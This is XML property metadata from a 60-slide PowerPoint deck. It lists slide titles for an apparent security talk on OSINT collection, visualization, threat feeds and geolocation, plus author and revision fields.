  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>615</Paragraphs>
  <Slides>60</Slides>
  <Notes>32</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>Design Template</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Embedded OLE Servers</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>60</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="62" baseType="lpstr">
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Visio</vt:lpstr>
      <vt:lpstr>OSINT Collection and Geospatial Information </vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Speaker Background</vt:lpstr>
      <vt:lpstr>What is OSINT?  </vt:lpstr>
      <vt:lpstr>Visualization</vt:lpstr>
      <vt:lpstr>Visualization – What is it good for?</vt:lpstr>
      <vt:lpstr>Davix – Live CD collection </vt:lpstr>
      <vt:lpstr>Davix – Gallery</vt:lpstr>
      <vt:lpstr>Davix – Gallery</vt:lpstr>
      <vt:lpstr>Davix – Gallery</vt:lpstr>
      <vt:lpstr>Davix – Gallery</vt:lpstr>
      <vt:lpstr>Possible Uses of Visualization </vt:lpstr>
      <vt:lpstr>Visualization – SIEM Tracking  Warnings and Alerts </vt:lpstr>
      <vt:lpstr>Visualization – SIEM Tracking  Visual Acuity </vt:lpstr>
      <vt:lpstr>Visualization – Malware C2 to Geo-location </vt:lpstr>
      <vt:lpstr>Visualization – Reverse Engineering VERA – DoE LANL Project</vt:lpstr>
      <vt:lpstr>Visualization – File Changes and time</vt:lpstr>
      <vt:lpstr>Examples of Visualization</vt:lpstr>
      <vt:lpstr>Security Operations Centers </vt:lpstr>
      <vt:lpstr>SIEM Event Mapping</vt:lpstr>
      <vt:lpstr>24 Hours of NIDS events</vt:lpstr>
      <vt:lpstr>Poor Man’s DDoS Detection</vt:lpstr>
      <vt:lpstr>Tools and Resources for OSINT Analysis </vt:lpstr>
      <vt:lpstr>Open-Source Intelligence (OSINT) Tools and Sites </vt:lpstr>
      <vt:lpstr>OSINT Tool - Maltego</vt:lpstr>
      <vt:lpstr>OSINT Tool – Maltego Example</vt:lpstr>
      <vt:lpstr>OSINT Tool - FOCA</vt:lpstr>
      <vt:lpstr>OSINT Tool – FOCA Example</vt:lpstr>
      <vt:lpstr>OSINT Tool – Analyst Notebook</vt:lpstr>
      <vt:lpstr>OSINT Tool – Analyst Notebook Example</vt:lpstr>
      <vt:lpstr>OSINT Site List </vt:lpstr>
      <vt:lpstr>OSINT Research - Shodan HQ </vt:lpstr>
      <vt:lpstr>OSINT Research - Spokeo.com </vt:lpstr>
      <vt:lpstr>Image Analysis – Creepy Tool</vt:lpstr>
      <vt:lpstr>Image Analysis - TinEye.com </vt:lpstr>
      <vt:lpstr>OSINT Tool(s) – Pastebin Monitoring</vt:lpstr>
      <vt:lpstr>OSINT Tool – hyperwired OPSEC tool</vt:lpstr>
      <vt:lpstr>OSINT Threat Feeds</vt:lpstr>
      <vt:lpstr>Threat Feeds – CIF </vt:lpstr>
      <vt:lpstr>Threat Feed – Enigma Indicators</vt:lpstr>
      <vt:lpstr>Enigma Babbin Port rewrite partial output </vt:lpstr>
      <vt:lpstr>Putting It All Together</vt:lpstr>
      <vt:lpstr>Advanced Persistent Threat (APT) – Shared Resources</vt:lpstr>
      <vt:lpstr>APT – Shared Resources Spear Phish Campaign</vt:lpstr>
      <vt:lpstr>Explain complex operations </vt:lpstr>
      <vt:lpstr>Slide 46</vt:lpstr>
      <vt:lpstr>Online Fraud – Fedvendor </vt:lpstr>
      <vt:lpstr>Fedvendor - Associations</vt:lpstr>
      <vt:lpstr>Social Media How to leverage it  </vt:lpstr>
      <vt:lpstr>Cyber to Physical – Tracking Lulzsec members</vt:lpstr>
      <vt:lpstr>Lulzsec Online Persona to Real People</vt:lpstr>
      <vt:lpstr>Social Media – Online Posting to Locations </vt:lpstr>
      <vt:lpstr>Maltego -</vt:lpstr>
      <vt:lpstr>Social Media, Images and Geo-Location</vt:lpstr>
      <vt:lpstr>Public Network Enumeration </vt:lpstr>
      <vt:lpstr>United Nations – Dual Homing </vt:lpstr>
      <vt:lpstr>Discovering that just out of life server</vt:lpstr>
      <vt:lpstr>Demo’s - Time permitting</vt:lpstr>
      <vt:lpstr>Conclusions</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Farnum</dc:creator>
  <cp:lastModifiedBy>Jacob Babbin</cp:lastModifiedBy>
  <cp:revision>211</cp:revision>
  <cp:lastPrinted>2013-02-20T00:41:39Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-09-24T13:18:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-09-24T13:30:02Z</dcterms:modified>
</cp:coreProperties>
</file>